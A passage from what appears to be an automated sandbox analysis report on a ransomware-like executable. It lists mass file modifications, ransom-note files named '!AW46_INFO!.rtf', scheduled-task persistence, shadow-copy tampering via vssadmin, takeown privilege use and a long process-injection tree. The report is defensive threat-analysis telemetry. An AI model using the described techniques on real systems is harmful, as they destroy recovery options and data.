Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ca.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\it.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoBeta.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1224 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1836 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1388 jigPt9cX64.exe 1388 jigPt9cX64.exe 1388 jigPt9cX64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1388 jigPt9cX64.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
description pid Process Token: SeDebugPrivilege 1388 jigPt9cX64.exe Token: SeLoadDriverPrivilege 1388 jigPt9cX64.exe Token: SeTakeOwnershipPrivilege 1864 takeown.exe Token: SeTakeOwnershipPrivilege 1928 takeown.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeBackupPrivilege 1872 vssvc.exe Token: SeRestorePrivilege 1872 vssvc.exe Token: SeAuditPrivilege 1872 vssvc.exe Token: SeTakeOwnershipPrivilege 1380 takeown.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeTakeOwnershipPrivilege 1812 takeown.exe Token: SeTakeOwnershipPrivilege 1316 takeown.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeTakeOwnershipPrivilege 816 takeown.exe Token: SeTakeOwnershipPrivilege 1380 takeown.exe Token: SeTakeOwnershipPrivilege 1072 takeown.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeTakeOwnershipPrivilege 1476 takeown.exe Token: SeTakeOwnershipPrivilege 968 takeown.exe Token: SeTakeOwnershipPrivilege 1756 takeown.exe Token: SeTakeOwnershipPrivilege 1988 takeown.exe Token: SeTakeOwnershipPrivilege 1780 takeown.exe Token: SeTakeOwnershipPrivilege 304 takeown.exe Token: SeTakeOwnershipPrivilege 896 takeown.exe Token: SeTakeOwnershipPrivilege 1876 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 1444 takeown.exe Token: SeTakeOwnershipPrivilege 1316 takeown.exe Token: SeTakeOwnershipPrivilege 336 takeown.exe Token: SeTakeOwnershipPrivilege 1912 takeown.exe Token: SeTakeOwnershipPrivilege 1824 takeown.exe Token: SeTakeOwnershipPrivilege 216 takeown.exe Token: SeTakeOwnershipPrivilege 1756 takeown.exe Token: SeTakeOwnershipPrivilege 556 takeown.exe Token: SeTakeOwnershipPrivilege 1696 takeown.exe Token: SeTakeOwnershipPrivilege 1624 takeown.exe Token: SeTakeOwnershipPrivilege 1028 takeown.exe Token: SeTakeOwnershipPrivilege 896 takeown.exe Token: SeTakeOwnershipPrivilege 1316 takeown.exe Token: SeTakeOwnershipPrivilege 968 takeown.exe Token: SeTakeOwnershipPrivilege 1912 takeown.exe Token: SeTakeOwnershipPrivilege 1920 takeown.exe Token: SeTakeOwnershipPrivilege 1572 takeown.exe Token: SeTakeOwnershipPrivilege 1696 takeown.exe Token: SeTakeOwnershipPrivilege 816 takeown.exe Token: SeTakeOwnershipPrivilege 1824 takeown.exe Token: SeTakeOwnershipPrivilege 1256 takeown.exe Token: SeTakeOwnershipPrivilege 1852 takeown.exe Token: SeTakeOwnershipPrivilege 1928 takeown.exe Token: SeTakeOwnershipPrivilege 828 takeown.exe Token: SeTakeOwnershipPrivilege 824 takeown.exe Token: SeTakeOwnershipPrivilege 1988 takeown.exe Token: SeTakeOwnershipPrivilege 204 takeown.exe Token: SeTakeOwnershipPrivilege 1696 takeown.exe Token: SeTakeOwnershipPrivilege 1444 takeown.exe Token: SeTakeOwnershipPrivilege 1768 takeown.exe Token: SeTakeOwnershipPrivilege 1696 takeown.exe Token: SeTakeOwnershipPrivilege 1920 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
description pid Process procid_target PID 1460 wrote to memory of 1504 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 26 PID 1460 wrote to memory of 1504 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 26 PID 1460 wrote to memory of 1504 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 26 PID 1460 wrote to memory of 1504 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 26 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 28 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 28 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 28 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 28 PID 1460 wrote to memory of 1116 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 33 PID 1460 wrote to memory of 1116 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 33 PID 1460 wrote to memory of 1116 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 33 PID 1460 wrote to memory of 1116 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 33 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 34 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 34 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 34 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 34 PID 1908 wrote to memory of 1492 1908 cmd.exe 37 PID 1908 wrote to memory of 1492 1908 cmd.exe 37 PID 1908 wrote to memory of 1492 1908 cmd.exe 37 PID 1908 wrote to memory of 1492 1908 cmd.exe 37 PID 1116 wrote to memory of 1568 1116 cmd.exe 38 PID 1116 wrote to memory of 1568 1116 cmd.exe 38 PID 1116 wrote to memory of 1568 1116 cmd.exe 38 PID 1116 wrote to memory of 1568 1116 cmd.exe 38 PID 1116 wrote to memory of 1504 1116 cmd.exe 39 PID 1116 wrote to memory of 1504 1116 cmd.exe 39 PID 1116 wrote to memory of 1504 1116 cmd.exe 39 PID 1116 wrote to memory of 1504 1116 cmd.exe 39 PID 1460 wrote to memory of 1772 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 40 PID 1460 wrote to memory of 1772 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 40 PID 1460 wrote to memory of 1772 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 40 PID 1460 wrote to memory of 1772 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 40 PID 1116 wrote to memory of 1824 1116 cmd.exe 42 PID 1116 wrote to memory of 1824 1116 cmd.exe 42 PID 1116 wrote to memory of 1824 1116 cmd.exe 42 PID 1116 wrote to memory of 1824 1116 cmd.exe 42 PID 1772 wrote to memory of 1992 1772 cmd.exe 43 PID 1772 wrote to memory of 1992 1772 cmd.exe 43 PID 1772 wrote to memory of 1992 1772 cmd.exe 43 PID 1772 wrote to memory of 1992 1772 cmd.exe 43 PID 1772 wrote to memory of 1264 1772 cmd.exe 44 PID 1772 wrote to memory of 1264 1772 cmd.exe 44 PID 1772 wrote to memory of 1264 1772 cmd.exe 44 PID 1772 wrote to memory of 1264 1772 cmd.exe 44 PID 1772 wrote to memory of 1180 1772 cmd.exe 45 PID 1772 wrote to memory of 1180 1772 cmd.exe 45 PID 1772 wrote to memory of 1180 1772 cmd.exe 45 PID 1772 wrote to memory of 1180 1772 cmd.exe 45 PID 1180 wrote to memory of 472 1180 cmd.exe 46 PID 1180 wrote to memory of 472 1180 cmd.exe 46 PID 1180 wrote to memory of 472 1180 cmd.exe 46 PID 1180 wrote to memory of 472 1180 cmd.exe 46 PID 1492 wrote to memory of 880 1492 wscript.exe 47 PID 1492 wrote to memory of 880 1492 wscript.exe 47 PID 1492 wrote to memory of 880 1492 wscript.exe 47 PID 1492 wrote to memory of 880 1492 wscript.exe 47 PID 472 wrote to memory of 1388 472 jigPt9cX.exe 50 PID 472 wrote to memory of 1388 472 jigPt9cX.exe 50 PID 472 wrote to memory of 1388 472 jigPt9cX.exe 50 PID 472 wrote to memory of 1388 472 jigPt9cX.exe 50 PID 880 wrote to memory of 1224 880 cmd.exe 51 PID 880 wrote to memory of 1224 880 cmd.exe 51 PID 880 wrote to memory of 1224 880 cmd.exe 51 PID 880 wrote to memory of 1224 880 cmd.exe 51 PID 1492 wrote to memory of 1692 1492 wscript.exe 52 PID 1492 wrote to memory of 1692 1492 wscript.exe 52 PID 1492 wrote to memory of 1692 1492 wscript.exe 52 PID 1492 wrote to memory of 1692 1492 wscript.exe 52 PID 1692 wrote to memory of 1912 1692 cmd.exe 54 PID 1692 wrote to memory of 1912 1692 cmd.exe 54 PID 1692 wrote to memory of 1912 1692 cmd.exe 54 PID 1692 wrote to memory of 1912 1692 cmd.exe 54 PID 1892 wrote to memory of 2044 1892 taskeng.exe 56 PID 1892 wrote to memory of 2044 1892 taskeng.exe 56 PID 1892 wrote to memory of 2044 1892 taskeng.exe 56 PID 1460 wrote to memory of 1316 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 57 PID 1460 wrote to memory of 1316 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 57 PID 1460 wrote to memory of 1316 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 57 PID 1460 wrote to memory of 1316 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 57 PID 1316 wrote to memory of 1152 1316 cmd.exe 59 PID 1316 wrote to memory of 1152 1316 cmd.exe 59 PID 1316 wrote to memory of 1152 1316 cmd.exe 59 PID 1316 wrote to memory of 1152 1316 cmd.exe 59 PID 1316 wrote to memory of 1020 1316 cmd.exe 60 PID 1316 wrote to memory of 1020 1316 cmd.exe 60 PID 1316 wrote to memory of 1020 1316 cmd.exe 60 PID 1316 wrote to memory of 1020 1316 cmd.exe 60 PID 1316 wrote to memory of 1916 1316 cmd.exe 61 PID 1316 wrote to memory of 1916 1316 cmd.exe 61 PID 1316 wrote to memory of 1916 1316 cmd.exe 61 PID 1316 wrote to memory of 1916 1316 cmd.exe 61 PID 1916 wrote to memory of 864 1916 cmd.exe 62 PID 1916 wrote to memory of 864 1916 cmd.exe 62 PID 1916 wrote to memory of 864 1916 cmd.exe 62 PID 1916 wrote to memory of 864 1916 cmd.exe 62 PID 1316 wrote to memory of 336 1316 cmd.exe 63 PID 1316 wrote to memory of 336 1316 cmd.exe 63 PID 1316 wrote to memory of 336 1316 cmd.exe 63 PID 1316 wrote to memory of 336 1316 cmd.exe 63 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 65 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 65 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 65 PID 1460 wrote to memory of 1780 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 65 PID 1780 wrote to memory of 1068 1780 cmd.exe 67 PID 1780 wrote to memory of 1068 1780 cmd.exe 67 PID 1780 wrote to memory of 1068 1780 cmd.exe 67 PID 1780 wrote to memory of 1068 1780 cmd.exe 67 PID 1780 wrote to memory of 832 1780 cmd.exe 68 PID 1780 wrote to memory of 832 1780 cmd.exe 68 PID 1780 wrote to memory of 832 1780 cmd.exe 68 PID 1780 wrote to memory of 832 1780 cmd.exe 68 PID 1780 wrote to memory of 1568 1780 cmd.exe 69 PID 1780 wrote to memory of 1568 1780 cmd.exe 69 PID 1780 wrote to memory of 1568 1780 cmd.exe 69 PID 1780 wrote to memory of 1568 1780 cmd.exe 69 PID 1568 wrote to memory of 1260 1568 cmd.exe 70 PID 1568 wrote to memory of 1260 1568 cmd.exe 70 PID 1568 wrote to memory of 1260 1568 cmd.exe 70 PID 1568 wrote to memory of 1260 1568 cmd.exe 70 PID 1780 wrote to memory of 1872 1780 cmd.exe 71 PID 1780 wrote to memory of 1872 1780 cmd.exe 71 PID 1780 wrote to memory of 1872 1780 cmd.exe 71 PID 1780 wrote to memory of 1872 1780 cmd.exe 71 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 72 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 72 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 72 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 72 PID 2044 wrote to memory of 1836 2044 cmd.exe 73 PID 2044 wrote to memory of 1836 2044 cmd.exe 73 PID 2044 wrote to memory of 1836 2044 cmd.exe 73 PID 1596 wrote to memory of 1992 1596 cmd.exe 75 PID 1596 wrote to memory of 1992 1596 cmd.exe 75 PID 1596 wrote to memory of 1992 1596 cmd.exe 75 PID 1596 wrote to memory of 1992 1596 cmd.exe 75 PID 1596 wrote to memory of 396 1596 cmd.exe 76 PID 1596 wrote to memory of 396 1596 cmd.exe 76 PID 1596 wrote to memory of 396 1596 cmd.exe 76 PID 1596 wrote to memory of 396 1596 cmd.exe 76 PID 1596 wrote to memory of 1152 1596 cmd.exe 77 PID 1596 wrote to memory of 1152 1596 cmd.exe 77 PID 1596 wrote to memory of 1152 1596 cmd.exe 77 PID 1596 wrote to memory of 1152 1596 cmd.exe 77 PID 1152 wrote to memory of 1020 1152 cmd.exe 78 PID 1152 wrote to memory of 1020 1152 cmd.exe 78 PID 1152 wrote to memory of 1020 1152 cmd.exe 78 PID 1152 wrote to memory of 1020 1152 cmd.exe 78 PID 1596 wrote to memory of 1828 1596 cmd.exe 79 PID 1596 wrote to memory of 1828 1596 cmd.exe 79 PID 1596 wrote to memory of 1828 1596 cmd.exe 79 PID 1596 wrote to memory of 1828 1596 cmd.exe 79 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 80 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 80 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 80 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 80 PID 432 wrote to memory of 240 432 cmd.exe 82 PID 432 wrote to memory of 240 432 cmd.exe 82 PID 432 wrote to memory of 240 432 cmd.exe 82 PID 432 wrote to memory of 240 432 cmd.exe 82 PID 432 wrote to memory of 2008 432 cmd.exe 83 PID 432 wrote to memory of 2008 432 cmd.exe 83 PID 432 wrote to memory of 2008 432 cmd.exe 83 PID 432 wrote to memory of 2008 432 cmd.exe 83 PID 432 wrote to memory of 1492 432 cmd.exe 84 PID 432 wrote to memory of 1492 432 cmd.exe 84 PID 432 wrote to memory of 1492 432 cmd.exe 84 PID 432 wrote to memory of 1492 432 cmd.exe 84 PID 1492 wrote to memory of 1428 1492 cmd.exe 85 PID 1492 wrote to memory of 1428 1492 cmd.exe 85 PID 1492 wrote to memory of 1428 1492 cmd.exe 85 PID 1492 wrote to memory of 1428 1492 cmd.exe 85 PID 432 wrote to memory of 1144 432 cmd.exe 86 PID 432 wrote to memory of 1144 432 cmd.exe 86 PID 432 wrote to memory of 1144 432 cmd.exe 86 PID 432 wrote to memory of 1144 432 cmd.exe 86 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 87 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 87 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 87 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 87 PID 1568 wrote to memory of 1824 1568 cmd.exe 89 PID 1568 wrote to memory of 1824 1568 cmd.exe 89 PID 1568 wrote to memory of 1824 1568 cmd.exe 89 PID 1568 wrote to memory of 1824 1568 cmd.exe 89 PID 1568 wrote to memory of 1864 1568 cmd.exe 90 PID 1568 wrote to memory of 1864 1568 cmd.exe 90 PID 1568 wrote to memory of 1864 1568 cmd.exe 90 PID 1568 wrote to memory of 1864 1568 cmd.exe 90 PID 1568 wrote to memory of 1792 1568 cmd.exe 91 PID 1568 wrote to memory of 1792 1568 cmd.exe 91 PID 1568 wrote to memory of 1792 1568 cmd.exe 91 PID 1568 wrote to memory of 1792 1568 cmd.exe 91 PID 1792 wrote to memory of 320 1792 cmd.exe 92 PID 1792 wrote to memory of 320 1792 cmd.exe 92 PID 1792 wrote to memory of 320 1792 cmd.exe 92 PID 1792 wrote to memory of 320 1792 cmd.exe 92 PID 1568 wrote to memory of 564 1568 cmd.exe 93 PID 1568 wrote to memory of 564 1568 cmd.exe 93 PID 1568 wrote to memory of 564 1568 cmd.exe 93 PID 1568 wrote to memory of 564 1568 cmd.exe 93 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 94 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 94 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 94 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 94 PID 1152 wrote to memory of 1640 1152 cmd.exe 96 PID 1152 wrote to memory of 1640 1152 cmd.exe 96 PID 1152 wrote to memory of 1640 1152 cmd.exe 96 PID 1152 wrote to memory of 1640 1152 cmd.exe 96 PID 1152 wrote to memory of 1928 1152 cmd.exe 97 PID 1152 wrote 